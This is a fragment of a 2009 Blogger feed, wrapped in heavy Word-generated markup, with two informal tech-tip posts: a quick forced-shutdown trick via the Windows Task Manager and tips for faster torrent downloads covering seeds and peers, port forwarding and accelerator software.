 table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="text-align: justify;"&gt;Imagine getting caught surfing&lt;span style=""&gt;  &lt;/span&gt;restricted sites by parents.’Lucky’ ppl who have had this opportunity no how it feels.The most common approach is to close the site while you hear sum one coming or sum one near at hand,but what if u could shut down windows in the same amount of time ,or even better .In most PC s it takes around 10 seconds or more to completely shut down&lt;span style=""&gt;  &lt;/span&gt;windows and in a bit older PCs it may cross the 20 second limit also&lt;span style=""&gt;  &lt;/span&gt;but then I just now mentioned that u can shut down windows in the same time which it takes \to close an active internet window.. how? Try this&lt;span style=""&gt;  &lt;/span&gt;… &lt;/p&gt;&lt;div style="text-align: justify;"&gt;  &lt;/div&gt;&lt;p style="text-align: justify;"&gt;&lt;span style="font-weight: bold;"&gt;Shut down windows in a matter of seconds. &lt;/span&gt;&lt;b&gt;&lt;span style="font-weight: bold;"&gt;While shutting down window. open task manager(Ctr+Alt+Del),&lt;/span&gt; &lt;span style="font-weight: bold;"&gt; Select shut down tab. and press ' Ctrl ' key and  select Turn Off from this tab.&lt;/span&gt; &lt;span style="font-weight: bold;"&gt; Within 2 seconds  windows will  shut down.&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SduHqPn_ZmI/AAAAAAAAAEw/hnZvsQ5QvhQ/s1600-h/Shutdown+3.jpg"&gt;&lt;img style="cursor: pointer; width: 400px; height: 386px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SduHqPn_ZmI/AAAAAAAAAEw/hnZvsQ5QvhQ/s400/Shutdown+3.jpg" alt="" id="BLOGGER_PHOTO_ID_5321996544486893154" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p style="text-align: justify;"&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p&gt;I have tested this method on various machines&lt;span style=""&gt;  &lt;/span&gt;with a stop watch and believe me do u no what is the fastest timing a mere 1.35 seconds n with a bit of practice can wrap up the&lt;span style=""&gt; &lt;/span&gt;entire session in a cool 3 seconds&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;How does this&lt;span style=""&gt;  &lt;/span&gt;process work??? Try out the answers yourself &lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;I will definitely post the answer in my future blogs but b4 that u all shud try at least once &lt;span style=""&gt;  &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-7691168215184012143?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/7691168215184012143/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/fastest-shutdown-method.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7691168215184012143'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7691168215184012143'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/fastest-shutdown-method.html' title='FASTEST SHUTDOWN METHOD'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/SduHqPn_ZmI/AAAAAAAAAEw/hnZvsQ5QvhQ/s72-c/Shutdown+3.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-6531837976907148636</id><published>2009-04-05T05:55:00.000-07:00</published><updated>2009-05-27T06:19:04.975-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOWNLOADS'/><title type='text'>INCREASE TORRENT SPEED</title><content type='html'>&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="country-region"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;b&gt;Torrentz&lt;/b&gt; is a torrent meta-search engine based in &lt;st1:country-region st="on"&gt;&lt;st1:place st="on"&gt;&lt;/st1:place&gt;&lt;/st1:country-region&gt;&lt;/span&gt;&lt;span style="text-decoration: underline;font-size:100%;" &gt;Sweden&lt;/span&gt;&lt;span style="font-size:100%;"&gt; (run by an admin, who goes by the name Flippy) that indexes torrents from various major torrent sites like Mininova, Demonoid, and The Pirate Bay. It offers compilations of various trackers per torrent that are not necessarily present in the default .torrent file so when a tracker is down, other trackers can do the work.you can download almost anything from toreentz site .ranging from movies ,songs ,PC games.etc.In a way Torrent is the biggest form of online piracy going on in todays world, Though I am no where near a torrent –addict I still manage to download around 40-50 gb every month., Compare this to the scenario a few years back when a person buying a brand new Pc got a &lt;/span&gt;&lt;span style="font-size:100%;"&gt; &lt;/span&gt;&lt;span style="font-size:100%;"&gt;hard disk with around 40 Gb storage space&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;-the space torrent freaks can consume in matter for just 3-4 days . However the most people complain that their torrent speed are slow ..i.e a person getting a transfer speed of around 200 kb/s on a 2 mb/s line gets around 110 or even less when downloading with torrent.There arte several ways to increase torrent speeds some of them are as follows &lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;1.SHARE RATIO&lt;/b&gt;: The main difference between direct download and downloading using torrent is that in case of direct download the file is stored in a remote server and&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;all the users download the file from the same location .,while torrent is a peer to peer service&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;the file is not stored in a&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;single specific&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;location The protocol works initially when a file provider makes his file (or group of files) available to the network. This is called a &lt;i&gt;seed&lt;/i&gt;&lt;i style=""&gt;peers or leechers&lt;/i&gt; to connect and download the file.after other people finish the download they again become the seed i.e and allows others, named &lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;they help other people downloading the file from theioir&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;PC,s &lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;Take an Example &lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;1 .A (seed) uploads a movie.B,C,and D (peer) start downloading&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;the file form A’s computer .Now the status of the torrent is &lt;b style=""&gt;1 Seeds&lt;/b&gt;&lt;i style=""&gt;(the person from whose’s PC the download is taking place)&lt;/i&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;and &lt;b style=""&gt;3 Peers&lt;/b&gt; (ppl downloading) After B,C n D finish their downloads they become seeds &lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;2 .Now say X starts his download .Now the status of the torrent is &lt;b style=""&gt;4 Seeds&lt;/b&gt; (A,B,C,D) and &lt;/span&gt;&lt;span style="font-size:100%;"&gt; &lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;1 Peers&lt;/b&gt; (X) .So naturally X will get more download speed than what B C D were getting when they were downloading because X can simultaneously download different portions of the file from the 4 seeds A B C D.while when B C D were downloading they had only 1 seed A and all 3 were downloading from A .&lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt; &lt;/span&gt;&lt;span style="font-size:100%;"&gt;Suppose A had set his upload speed as 90 Kb/s then B,C,.D wud hav to share the bandwidth among themselves hence they wud get around 30 kb/s each .now lets&lt;/span&gt;&lt;span style="font-size:100%;"&gt;  &lt;/span&gt;&lt;span style="font-size:100%;"&gt;in 2nd c : if A B C D set their upload speeds at even 50 kb/s then X will get 200 kb/s download because he is the only peer .Thus in case of torrent download not only download speed of the user matters the no of seeders and peers also matters a lot .&lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;THE BOTTOMLINE IS TO GET A FASTER DOWENLOAD SELECT A TORRENT WITH MORE SEEDS AND LESS PEERS . &lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;Upload/download ratio is called share ratio        &lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;2&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt; .&lt;b style=""&gt;PORT FORWARDING&lt;/b&gt;&lt;b style=""&gt; : &lt;/b&gt;Sumtimes the ports used by the torrent client are blocked by the windows firewall or the hardware firewall of the router provided ny the I.S.P how to test whether the port is forwarded or not check this site : &lt;a href="http://portforward.com/" target="_blank"&gt;http://portforward.com/&lt;/a&gt; is a good resource to also test and know more about port forwarding&lt;/span&gt;&lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SditIShhWTI/AAAAAAAAAEo/XzmM-_BRl14/s1600-h/Torrent+.jpg"&gt;&lt;img style="cursor: pointer; width: 400px; height: 268px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SditIShhWTI/AAAAAAAAAEo/XzmM-_BRl14/s400/Torrent+.jpg" alt="" id="BLOGGER_PHOTO_ID_5321193317661235506" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link style="font-family: arial; color: rgb(255, 255, 255);" rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;"&gt;&lt;span style="font-size:100%;"&gt;Another important link&lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://utorrent.com/faq.php#What_do_the_Network_Status_lights_mean.3F" target="_blank"&gt;http://utorrent.com/faq.php#What_do_the_Network_Status_lights_mean.3F&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;  &lt;!--[if !supportLineBreakNewLine]--&gt;&lt;/p&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link style="font-family: arial; color: rgb(255, 255, 255);" rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;span style="color: rgb(255, 255, 255);font-family:arial;font-size:100%;"  &gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="City"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;/span&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;3. TORRENT ACCLERATORS-: &lt;/b&gt;These software’s accelerate torrent speed by maximizing bandwidth usage to get the latest torrent accelerator &lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;try this&lt;br /&gt;&lt;a href="http://www.trafficspeeders.com/" target="_blank"&gt;www.trafficspeeders.com&lt;/a&gt;&lt;br /&gt;and dwld a accelerator for &lt;st1:place st="on"&gt;&lt;st1:city st="on"&gt;ur&lt;/st1:city&gt;&lt;/st1:place&gt; torrent client&lt;/span&gt;&lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_T53992hHLOM/SdirjjuWBPI/AAAAAAAAAEg/7HUHSmbndko/s1600-h/torrent+accelerator.jpg"&gt;&lt;img style="cursor: pointer; width: 400px; height: 399px;" src="http://3.bp.blogspot.com/_T53992hHLOM/SdirjjuWBPI/AAAAAAAAAEg/7HUHSmbndko/s400/torrent+accelerator.jpg" alt="" id="BLOGGER_PHOTO_ID_5321191587111634162" border="0" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;  &lt;!--[endif]--&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="City"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;/span&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   